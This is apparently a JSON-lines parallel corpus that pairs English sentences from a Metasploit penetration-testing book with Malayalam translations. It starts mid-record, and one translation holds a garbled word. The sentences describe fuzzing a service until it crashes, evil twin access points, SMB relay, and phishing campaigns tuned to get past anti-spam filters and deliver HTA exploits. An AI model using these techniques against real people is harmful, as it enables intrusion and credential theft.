മിക്സിൻ ഉപയോഗിച്ച് അഭ്യർത്ഥന അയക്കാൻ sock.put ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"It begins by initializing the required variables, which hold the last request sent.","translation":"അവസാനം അയച്ച അഭ്യർത്ഥന ഉൾപ്പെടെ ആവശ്യമായ വേരിയബിളുകൾ ആരംഭിക്കുന്നതിലൂടെ ഇത് ആരംഭിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"If the waiting period for the response times out, the service is considered to be down.","translation":"പ്രതികരണത്തിനായുള്ള കാത്തിരിപ്പ് കാലയളവ് കഴിഞ്ഞാൽ, സേവനം നിലച്ചതായി കണക്കാക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Great, our fuzzing module works and it is able to crash the Disk Sorter Enterprise service.","translation":"നന്നായിരിക്കുന്നു, നമ്മുടെ ഫസ്സിംഗ് മൊഡ്യൂൾ പ്രവർത്തിക്കുന്നു, കൂടാതെ ഡിസ്ക് സോർട്ടർ എന്റർപ്രൈസ് സേവനം തകർക്കാൻ ഇതിന് കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Generally, it is not recommended you use Metasploit as a fuzzing platform for large software.","translation":"സാധാരണയായി, വലിയ സോഫ്റ്റ്‌വെയറിനായി ഒരു ഫസ്സിംഗ് പ്ലാറ്റ്‌ഫോമായി മെറ്റാസ്‌പ്ലോയിറ്റ് ഉപയോഗിക്കാൻ ശുപാർശ ചെയ്യുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Penetration testing of wireless networks can present an organization with the real risks.","translation":"വയർലെസ് നെറ്റ്‌വർക്കുകളുടെ പെനെട്രേഷൻ ടെസ്റ്റിംഗ് ഒരു സ്ഥാപനത്തിന് യഥാർത്ഥ അപകടസാധ്യതകൾ നൽകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Metasploit is one of the best tools to use when performing wireless penetration testing.","translation":"വയർലെസ് പെനെട്രേഷൻ ടെസ്റ്റിംഗ് നടത്തുമ്പോൾ ഉപയോഗിക്കാനുള്ള ഏറ്റവും മികച്ച ഉപകരണങ്ങളിൽ ഒന്നാണ് മെറ്റാസ്‌പ്ലോയിറ്റ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We will start by using the Windows Gather Wireless Current Connection Info post-exploitation module.","translation":"വിൻഡോസ് ഗാഥർ വയർലെസ് കറന്റ് കണക്ഷൻ ഇൻഫോ പോസ്റ്റ്-എക്സ്പ്ലോയിറ്റേഷൻ മൊഡ്യൂൾ ഉപയോഗിച്ച് ഞങ്ങൾ ആരംഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"An evil twin attack is a type of Wi-Fi attack where a rogue Wi-Fi access point is used.","translation":"ഒരു ദുഷ്ട ഇരട്ട ആക്രമണം എന്നത് ഒരുതരം Wi-Fi ആക്രമണമാണ്, അവിടെ ഒരു കള്ള Wi-Fi ആക്സസ് പോയിന്റ് ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"By imitating a legitimate access point, we can trick users into connecting to it.","translation":"ഒരു നിയമാനുസൃത ആക്സസ് പോയിൻ്റിനെ അനുകരിക്കുന്നതിലൂടെ, ഉപയോക്താക്കളെ അതിലേക്ക് കണക്ട് ചെയ്യാൻ നമുക്ക് പ്രേരിപ്പിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We will start by installing a DHCP server to dynamically configure the victim's IP setting.","translation":"ഇരയുടെ IP ക്രമീകരണം ഡൈനാമിക് ആയി കോൺഫിഗർ ചെയ്യുന്നതിന് ഒരു DHCP സെർവർ ഇൻസ്റ്റാൾ ചെയ്യുന്നതിലൂടെ ഞങ്ങൾ ആരംഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Because of sending continuous probes, any adversary within this range can listen passively.","translation":"തുടർച്ചയായ പ്രോബുകൾ അയക്കുന്നതിനാൽ, ഈ പരിധിയിലുള്ള ഏതൊരു എതിരാളിക്കും നിഷ്ക്രിയമായി കേൾക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"SMB relay attacks allow us to relay SMB authentication requests to another host.","translation":"SMB റിലേ ആക്രമണങ്ങൾ SMB പ്രാമാണീകരണ അഭ്യർത്ഥനകൾ മറ്റൊരു ഹോസ്റ്റിലേക്ക് റിലേ ചെയ്യാൻ അനുവദിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"If you want to improve the chances of your campaign not been caught, you can use Let's Encrypt to generate a free TLS certificate and use it to configure Gophish to serve the phishing URL via HTTPS.","translation":"നിങ്ങളുടെ കാമ്പയിൻ കണ്ടുപിടിക്കപ്പെടാതിരിക്കാനുള്ള സാധ്യത വർദ്ധിപ്പിക്കാൻ, സൗജന്യ TLS സർട്ടിഫിക്കറ്റ് ഉണ്ടാക്കാൻ Let's Encrypt ഉപയോഗിക്കാവുന്നതാണ്, കൂടാതെ HTTPS വഴി ഫിഷിംഗ് URL നൽകുന്നതിനായി Gophish കോൺഫിഗർ ചെയ്യാനും ഇത് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"When setting up an email server for phishing campaigns, do not forget to configure SPF, DKIM, and DMARC as you would in a regular email server; this will make your server look legitimate and give you a better chance of bypassing anti-spam technologies.","translation":"ഫിഷിംഗ് കാമ്പയിനുകൾക്കായി ഒരു ഇമെയിൽ സെർവർ സജ്ജീകരിക്കുമ്പോൾ, ഒരു സാധാരണ ഇമെയിൽ സെർവറിൽ ചെയ്യുന്നതുപോലെ SPF, DKIM, DMARC എന്നിവ കോൺഫിഗർ ചെയ്യാൻ മറക്കരുത്; ഇത് നിങ്ങളുടെ സെർവറിനെ നിയമപരമായി കാണിക്കുകയും സ്പാം വിരുദ്ധ സാങ്കേതികവിദ്യകളെ മറികടക്കാൻ സഹായിക്കുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"One way to ensure your phishing emails will get to the intended recipients is to use hosted business email solutions such as Zoho Mail.","translation":"നിങ്ങളുടെ ഫിഷിംഗ് ഇമെയിലുകൾ ഉദ്ദേശിച്ച സ്വീകർത്താക്കൾക്ക് ലഭിക്കുമെന്ന് ഉറപ്പാക്കാനുള്ള ഒരു മാർഗ്ഗം Zoho Mail പോലുള്ള ഹോസ്റ്റുചെയ്ത ബിസിനസ് ഇമെയിൽ സൊല്യൂഷനുകൾ ഉപയോഗിക്കുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Just go to https://www.zoho.com/mail/, create a free business email account, and you are good to go.","translation":"https://www.zoho.com/mail/ എന്ന വെബ്സൈറ്റിൽ പോവുക, ഒരു സൗജന്യ ബിസിനസ് ഇമെയിൽ അക്കൗണ്ട് ഉണ്ടാക്കുക, തുടർന്ന് നിങ്ങൾക്ക് ഉപയോഗിക്കാവുന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"It even allows you to set up a custom domain, which you can use to reinforce your phishing campaign pretext.","translation":"നിങ്ങളുടെ ഫിഷിംഗ് കാമ്പയിനിന്റെ പ്രീടെക്സ്റ്റ് ശക്തിപ്പെടുത്താൻ ഉപയോഗിക്കാവുന്ന ഒരു ഇഷ്ടമുള്ള ഡൊമെയ്ൻ സജ്ജീകരിക്കാനും ഇത് നിങ്ങളെ അനുവദിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In this recipe, I will not cover how to set up and configure a phishing campaign with Gophish.","translation":"ഈ പാചകക്കുറിപ്പിൽ, Gophish ഉപയോഗിച്ച് ഒരു ഫിഷിംഗ് കാമ്പയിൻ എങ്ങനെ സജ്ജീകരിക്കാമെന്നും കോൺഫിഗർ ചെയ്യാമെന്നും ഞാൻ ഉൾപ്പെടുത്തുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"You can find the updated documentation at https:/​/​gophish.​gitbooks.​io/ user-​guide/​content/​getting_​started.​html.","translation":"https:/​/​gophish.​gitbooks.​io/ user-​guide/​content/​getting_​started.​html എന്ന വെബ്സൈറ്റിൽ നിങ്ങൾക്ക് അപ്‌ഡേറ്റ് ചെയ്ത ഡോക്യുമെന്റേഷൻ കണ്ടെത്താനാകും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The objective of this recipe is to show you that you can and should take advantage of cloud technologies to ease some of the tasks performed during a penetration test.","translation":"ഒരു പെനെട്രേഷൻ ടെസ്റ്റിംഗിൽ ചെയ്യുന്ന ചില ടാസ്‌ക്കുകൾ എളുപ്പമാക്കുന്നതിന്, ക്ലൗഡ് സാങ്കേതികവിദ്യകൾ പ്രയോജനപ്പെടുത്താൻ നിങ്ങൾക്ക് കഴിയുമെന്നും അത് ചെയ്യണമെന്നും ഈ പാചകക്കുറിപ്പ് കാണിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that you know how to set up and launch a phishing campaign, you can, for example, embed an HTML application link in the phishing email using the Metasploit HTA Web Server exploit module in order to compromise the target.","translation":"ഒരു ഫിഷിംഗ് കാമ്പയിൻ എങ്ങനെ സജ്ജീകരിക്കാമെന്നും ആരംഭിക്കാമെന്നും ഇപ്പോൾ നിങ്ങൾക്കറിയാം, ഉദാഹരണത്തിന്, ടാർഗെറ്റിനെ kompromi ചെയ്യാനായി Metasploit HTA വെബ് സെർവർ എക്സ്പ്ലോയിറ്റ് മൊഡ്യൂൾ ഉപയോഗിച്ച് ഫിഷിംഗ് ഇമെയിലിൽ ഒരു HTML ആപ്ലിക്കേഷൻ ലിങ്ക് ഉൾപ്പെടുത്താം.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Then, when the target opens the email and runs the HTA, you will get a new session.","translation":"തുടർന്ന്, ലക്ഷ്യം ഇമെയിൽ തുറന്ന് HTA പ്രവർത്തിപ്പിക്കുമ്പോൾ, നിങ്ങൾക്ക് ഒരു പുതിയ സെഷൻ ലഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Imagination and practice are your friends; you are not limited to HTA.","translation":"ഭാവനയും പരിശീലനവുമാണ് നിങ്ങളുടെ സുഹൃത്തുക്കൾ; നിങ്ങൾ HTA-യിൽ മാത്രം ഒതുങ്ങുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Learn from the adversary; by reading the latest security reports, you can learn about new attack vectors used in the wild and mimic them using Metasploit.","translation":"എതിരാളിയിൽ നിന്ന് പഠിക്കുക; ഏറ്റവും പുതിയ സുരക്ഷാ റിപ്പോർട്ടുകൾ വായിക്കുന്നതിലൂടെ, ലോകത്ത് ഉപയോഗിക്കുന്ന പുതിയ ആക്രമണ രീതികളെക്കുറിച്ച് നിങ്ങൾക്ക് അറിയാനും Metasploit ഉപയോഗിച്ച് അവ അനുകരിക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Setting up a cloud penetration testing lab Testing new tools and techniques is an important part of a penetration tester's job.","translation":"ഒരു ക്ലൗഡ് പെനെട്രേഷൻ ടെസ്റ്റിംഗ് ലാബ് സ്ഥാപിക്കുന്നു. പുതിയ ടൂളുകളും ടെക്നിക്കുകളും പരീക്ഷിക്കുന്നത് ഒരു പെനെട്രേഷൻ ടെസ്റ്ററുടെ ജോലിയുടെ പ്രധാന ഭാഗമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Every day new tools are created and new techniques found, so keep up with the industry.","translation":"എല്ലാ ദിവസവും പുതിയ ടൂളുകൾ ഉണ്ടാക്കുകയും പുതിയ ടെക്നിക്കുകൾ കണ്ടെത്തുകയും ചെയ്യുന്നു, അതിനാൽ ഈ വ്യവസായവുമായി കാലികമായിരിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"We have to invest a fair amount of our time practicing and mastering the tools of our trade.","translation":"നമ്മുടെ കഴിവിനുള്ള ടൂളുകൾ പരിശീലിക്കുന്നതിനും അതിൽ പ്രാവീണ്യം നേടുന്നതിനും നമ്മുടെ സമയം നല്ലരീതിയിൽ വിനിയോഗിക്കണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Having a data center where we can set up a lab environment and practice is not always possible and can be quite expensive.","translation":"ഒരു ലാബ് പരിസ്ഥിതി സജ്ജീകരിക്കാനും പരിശീലിക്കാനും കഴിയുന്ന ഒരു ഡാറ്റാ സെന്റർ എപ്പോഴും സാധ്യമല്ല, ഇത് വളരെ ചെലവേറിയതുമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"With cloud services getting cheaper, faster, and easier to use, we do not have an excuse not to have a penetration testing lab.","translation":"ക്ലൗഡ് സേവനങ്ങൾ വിലകുറഞ്ഞതും വേഗതയേറിയതും ഉപയോഗിക്കാൻ എളുപ്പമുള്ളതുമായതിനാൽ, ഒരു പെനെട്രേഷൻ ടെസ്റ്റിംഗ് ലാബ് ഇല്ലാതിരിക്കാൻ നമുക്ക് ഒരു ഒഴികഴിവുമില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Take for example Azure; create a free account, and you get $200 of credit to explore services for 30 days.","translation":"ഉദാഹരണത്തിന് Azure എടുക്കുക; ഒരു സൗജന്യ അക്കൗണ്ട് ഉണ്ടാക്കുക, കൂടാതെ 30 ദിവസത്തേക്ക് സേവനങ്ങൾ പര്യവേക്ഷണം ചെയ്യാൻ നിങ്ങൾക്ക് $200 ക്രെഡിറ്റ് ലഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Take a look at the virtual machines available, and you will see that creating a lab domain like the one used in this book can be done with a couple of clicks.","translation":"ലഭ്യമായ വെർച്വൽ മെഷീനുകൾ പരിശോധിക്കുക, ഈ പുസ്തകത്തിൽ ഉപയോഗിച്ചിരിക്കുന്നതുപോലെയുള്ള ഒരു ലാബ് ഡൊമെയ്ൻ കുറച്ച് ക്ലിക്കുകളിലൂടെ ഉണ്ടാക്കാൻ കഴിയുമെന്ന് നിങ്ങൾ കാണും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"One of the biggest concerns with deploying vulnerable machines is to keep them contained and not expose them to the internet.","translation":"ദോഷകരമായ മെഷീനുകൾ വിന്യസിക്കുന്നതിലെ ഏറ്റവും വലിയ ആശങ്കകളിലൊന്ന്, അവയെ നിയന്ത്രിക്കുകയും ഇന്റർനെറ്റിലേക്ക് എക്സ്പോസ് ചെയ്യാതിരിക്കുകയും ചെയ്യുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"}